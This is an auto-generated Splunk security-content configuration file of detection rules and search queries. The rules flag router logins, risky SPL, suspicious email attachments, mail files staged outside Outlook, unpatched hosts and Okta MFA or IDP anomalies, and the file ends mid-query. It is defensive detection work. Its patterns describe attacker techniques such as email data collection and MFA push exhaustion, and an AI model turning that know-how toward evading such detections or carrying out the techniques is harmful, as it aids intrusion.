############# # Automatically generated by generator.py in splunk/security_content # On Date: 2024-04-17T22:08:10 UTC # Author: Splunk Threat Research Team - Splunk # Contact: research@splunk.com ############# ### ESCU DETECTIONS ### [ESCU - Detect New Login Attempts to Routers - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days. action.escu.how_to_implement = To successfully implement this search, you must ensure the network router devices are categorized as "router" in the Assets and identity table. You must also populate the Authentication data model with logs related to users authenticating to routing infrastructure. action.escu.known_false_positives = Legitimate router connections may appear as new connections action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Login Attempts to Routers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Router and Infrastructure Security"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect New Login Attempts to Routers - Rule action.correlationsearch.annotations = {"analytic_story": ["Router and Infrastructure Security"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days. action.notable.param.rule_title = Detect New Login Attempts to Routers action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count earliest(_time) as earliest latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router by Authentication.dest Authentication.user| eval isOutlier=if(earliest >= relative_time(now(), "-30d@d"), 1, 0) | where isOutlier=1| `security_content_ctime(earliest)`| `security_content_ctime(latest)` | `drop_dm_object_name("Authentication")` | `detect_new_login_attempts_to_routers_filter` [ESCU - Detect Risky SPL using Pretrained ML Model - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic uses a pretrained machine learning text classifier to detect potentially risky commands. The model is trained independently and then the model file is packaged within ESCU for usage. A command is deemed risky based on the presence of certain trigger keywords, along with the context and the role of the user (please see references). The model uses custom features to predict whether a SPL is risky using text classification. The model takes as input the command text, user and search type and outputs a risk score between [0,1]. A high score indicates higher likelihood of a command being risky. This model is on-prem only. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = The following analytic uses a pretrained machine learning text classifier to detect potentially risky commands. The model is trained independently and then the model file is packaged within ESCU for usage. A command is deemed risky based on the presence of certain trigger keywords, along with the context and the role of the user (please see references). The model uses custom features to predict whether a SPL is risky using text classification. The model takes as input the command text, user and search type and outputs a risk score between [0,1]. A high score indicates higher likelihood of a command being risky. This model is on-prem only. action.escu.how_to_implement = This detection depends on the MLTK app which can be found here - https://splunkbase.splunk.com/app/2890/ and the Splunk Audit datamodel which can be found here - https://splunkbase.splunk.com/app/1621/. Additionally, you need to be ingesting logs which include Search_Activity.search, Search_Activity.user, Search_Activity.search_type from your endpoints. The risk score threshold should be adjusted based on the environment. The detection uses a custom MLTK model hence we need a few more steps for deployment, as outlined here - https://gist.github.com/ksharad-splunk/be2a62227966049047f5e5c4f2adcabb. action.escu.known_false_positives = False positives may be present if suspicious behavior is observed, as determined by frequent usage of risky keywords. action.escu.creation_date = 2022-06-16 action.escu.modification_date = 2022-06-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Risky SPL using Pretrained ML Model - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = A potentially risky Splunk command has been run by $user$, kindly review. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Risky SPL using Pretrained ML Model - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.user Search_Activity.search_type | eval spl_text = 'Search_Activity.search'. " " .'Search_Activity.user'. " " .'Search_Activity.search_type'| dedup spl_text | apply risky_spl_pre_trained_model | where risk_score > 0.5 | `drop_dm_object_name(Search_Activity)` | table search, user, search_type, risk_score | `detect_risky_spl_using_pretrained_ml_model_filter` [ESCU - Email Attachments With Lots Of Spaces - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Attackers often use spaces as a means to obfuscate an attachment's file extension. This search looks for messages with email attachments that have many spaces within the file names. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = ["Email"] action.escu.eli5 = Attackers often use spaces as a means to obfuscate an attachment's file extension. This search looks for messages with email attachments that have many spaces within the file names. action.escu.how_to_implement = You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. The threshold ratio is set to 10%, but this value can be configured to suit each environment. \ **Splunk Phantom Playbook Integration**\ If Splunk Phantom is also configured in your environment, a playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/` and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox. action.escu.known_false_positives = None at this time action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Email Attachments With Lots Of Spaces - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Email Attachments With Lots Of Spaces - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(All_Email.recipient) as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio >= 0.1 | rex field=recipient_address "(?.*)@" | `email_attachments_with_lots_of_spaces_filter` [ESCU - Email files written outside of the Outlook directory - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes. action.escu.known_false_positives = Administrators and users sometimes prefer backing up their email data by moving the email files into a different folder. These attempts will be detected by the search. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Email files written outside of the Outlook directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Collection and Staging"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Email files written outside of the Outlook directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory. action.notable.param.rule_title = Email files written outside of the Outlook directory action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path != "C:\\Users\\*\\My Documents\\Outlook Files\\*" Filesystem.file_path!="C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*" by Filesystem.action Filesystem.process_id Filesystem.file_name Filesystem.dest | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `email_files_written_outside_of_the_outlook_directory_filter` [ESCU - Email servers sending high volume traffic to hosts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Network_Traffic"] action.escu.eli5 = This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server. action.escu.how_to_implement = This search requires you to be ingesting your network traffic and populating the Network_Traffic data model. Your email servers must be categorized as "email_server" for the search to work, as well. You may need to adjust the deviation_threshold and minimum_data_samples values based on the network traffic in your environment. The "deviation_threshold" field is a multiplying factor to control how much variation you're willing to tolerate. The "minimum_data_samples" field is the minimum number of connections of data samples required for the statistic to be valid. action.escu.known_false_positives = The false-positive rate will vary based on how you set the deviation_threshold and data_samples values. Our recommendation is to adjust these values based on your network traffic to and from your email servers. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Email servers sending high volume traffic to hosts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Collection and Staging", "HAFNIUM Group"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Email servers sending high volume traffic to hosts - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "HAFNIUM Group"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip _time span=1d | `drop_dm_object_name("All_Traffic")` | eventstats avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_stdev_bytes_out by dest_ip | eval minimum_data_samples = 4, deviation_threshold = 3 | where num_data_samples >= minimum_data_samples AND bytes_out > (avg_bytes_out + (deviation_threshold * stdev_bytes_out)) AND bytes_out > (per_source_avg_bytes_out + (deviation_threshold * per_source_stdev_bytes_out)) AND _time >= relative_time(now(), "@d") | eval num_standard_deviations_away_from_server_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out, 2), num_standard_deviations_away_from_client_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out, 2) | table dest_ip, _time, bytes_out, avg_bytes_out, per_source_avg_bytes_out, num_standard_deviations_away_from_server_average, num_standard_deviations_away_from_client_average | `email_servers_sending_high_volume_traffic_to_hosts_filter` [ESCU - Monitor Email For Brand Abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse. action.escu.how_to_implement = You need to ingest email header data. Specifically the sender's address (src_user) must be populated. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for. action.escu.known_false_positives = None at this time action.escu.creation_date = 2018-01-05 action.escu.modification_date = 2018-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Monitor Email For Brand Abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Brand Monitoring", "Suspicious Emails"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Monitor Email For Brand Abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["Brand Monitoring", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse. action.notable.param.rule_title = Monitor Email For Brand Abuse action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Email.recipient) as recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email by All_Email.src_user, All_Email.message_id | `drop_dm_object_name("All_Email")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval temp=split(src_user, "@") | eval email_domain=mvindex(temp, 1) | lookup update=true brandMonitoring_lookup domain as email_domain OUTPUT domain_abuse | search domain_abuse=true | table message_id, src_user, email_domain, recipients, firstTime, lastTime | `monitor_email_for_brand_abuse_filter` [ESCU - No Windows Updates in a time frame - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Updates"] action.escu.eli5 = This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason. action.escu.how_to_implement = To successfully implement this search, it requires that the 'Update' data model is being populated. This can be accomplished by ingesting Windows events or the Windows Update log via a universal forwarder on the Windows endpoints you wish to monitor. The Windows add-on should be also be installed and configured to properly parse Windows events in Splunk. There may be other data sources which can populate this data model, including vulnerability management systems. action.escu.known_false_positives = None identified action.escu.creation_date = 2017-09-15 action.escu.modification_date = 2017-09-15 action.escu.confidence = high action.escu.full_search_name = ESCU - No Windows Updates in a time frame - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Monitor for Updates"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - No Windows Updates in a time frame - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor for Updates"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` max(_time) as lastTime from datamodel=Updates where Updates.status=Installed Updates.vendor_product="Microsoft Windows" by Updates.dest Updates.status Updates.vendor_product | rename Updates.dest as Host | rename Updates.status as "Update Status" | rename Updates.vendor_product as Product | eval isOutlier=if(lastTime <= relative_time(now(), "-60d@d"), 1, 0) | `security_content_ctime(lastTime)` | search isOutlier=1 | rename lastTime as "Last Update Time", | table Host, "Update Status", Product, "Last Update Time" | `no_windows_updates_in_a_time_frame_filter` [ESCU - Okta Authentication Failed During MFA Challenge - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for a specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for a specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = A user may have accidentally entered the wrong credentials during the MFA challenge. If the user is new to MFA, they may have trouble authenticating. Ensure that the user is aware of the MFA process and has the correct credentials. action.escu.creation_date = 2024-03-11 action.escu.modification_date = 2024-03-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Authentication Failed During MFA Challenge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] has failed to authenticate via MFA from IP Address - [$src$]" action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Authentication Failed During MFA Challenge - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for a specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.notable.param.rule_title = Okta Authentication Failed During MFA Challenge action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Authentication.app) as app values(Authentication.reason) as reason values(Authentication.signature) as signature values(Authentication.method) as method from datamodel=Authentication where Authentication.signature=user.authentication.auth_via_mfa Authentication.action = failure by _time Authentication.src Authentication.user Authentication.dest Authentication.action | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| iplocation src | `okta_authentication_failed_during_mfa_challenge_filter` [ESCU - Okta IDP Lifecycle Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection identifies modifications to Okta Identity Provider (IDP) lifecycle events, such as creation, activation, deactivation, and deletion of IDP configurations. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms within an organization. By detecting unauthorized or anomalous changes, organizations can quickly respond to potential security breaches or misconfigurations, ensuring that their identity management systems remain secure and operational. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection identifies modifications to Okta Identity Provider (IDP) lifecycle events, such as creation, activation, deactivation, and deletion of IDP configurations. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms within an organization. By detecting unauthorized or anomalous changes, organizations can quickly respond to potential security breaches or misconfigurations, ensuring that their identity management systems remain secure and operational. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = It's possible for legitimate administrative actions or automated processes to trigger this detection, especially if there are bulk modifications to Okta IDP lifecycle events. Review the context of the modification, such as the user making the change and the specific lifecycle event modified, to determine if it aligns with expected behavior. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta IDP Lifecycle Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = A user [$user$] is attempting IDP lifecycle modification - [$description$] from IP Address - [$src$]" action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta IDP Lifecycle Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN ("system.idp.lifecycle.activate","system.idp.lifecycle.create","system.idp.lifecycle.delete","system.idp.lifecycle.deactivate") | stats count min(_time) as firstTime max(_time) as lastTime values(target{}.id) as target_id values(target{}.type) as target_modified by src dest src_user_id user user_agent command description | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_idp_lifecycle_modifications_filter` [ESCU - Okta MFA Exhaustion Hunt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies patterns within Okta data to determine the amount of successful and failed pushes. Based on that, eval statements determine a finding of whether this is suspicious or not. The events are within a window of time and may be tuned as needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies patterns within Okta data to determine the amount of successful and failed pushes. Based on that, eval statements determine a finding of whether this is suspicious or not. The events are within a window of time and may be tuned as needed. action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. Drop to anomaly until tuning is complete. action.escu.creation_date = 2022-09-27 action.escu.modification_date = 2022-09-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta MFA Exhaustion Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta MFA Exhaustion Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=system.push.send_factor_verify_push OR ((legacyEventType=core.user.factor.attempt_success) AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) OR ((legacyEventType=core.user.factor.attempt_fail) AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) | stats count(eval(legacyEventType="core.user.factor.attempt_success")) as successes count(eval(legacyEventType="core.user.factor.attempt_fail")) as failures 